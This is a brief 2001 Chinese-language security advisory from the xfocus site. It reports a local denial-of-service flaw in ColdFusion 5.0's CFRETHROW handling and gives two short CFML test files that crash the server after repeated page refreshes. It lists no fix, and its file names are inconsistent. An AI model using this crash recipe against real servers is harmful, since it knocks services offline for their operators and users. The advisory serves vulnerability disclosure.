xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Cold Fusion CFRETHROW 存在漏洞


发布时间:2001-08-01
更新时间:2001-08-01
严重程度:
威胁程度:本地拒绝服务
错误类型:设计错误
利用方式:服务器模式

受影响系统
Cold Fusion version 5.0
详细描述
Cold Fusion(http://www.macromedia.com/software/coldfusion/)允许
攻击者建立临时文件导致服务崩溃。建立2个文件file1.cfm和file2.cfm,
在file1.cfm中输入如下代码:

--------------------------
<CFTRY>
        <CFINCLUDE TEMPLATE="test2.cfm">
        <CFCATCH>
                Call encrypted tag or include template here
                <CFRETHROW>
        </CFCATCH>
</CFTRY>
--------------------------

而 file2.cfm放如下代码:

--------------------------
<CFTHROW MESSAGE="TEST">

调用任意custom tag,然后从WEB浏览器调用test.cfm,多刷新几次
会导致服务崩溃。

测试代码
见描述部分。

解决方案
尚无

相关信息
eric at isdn.net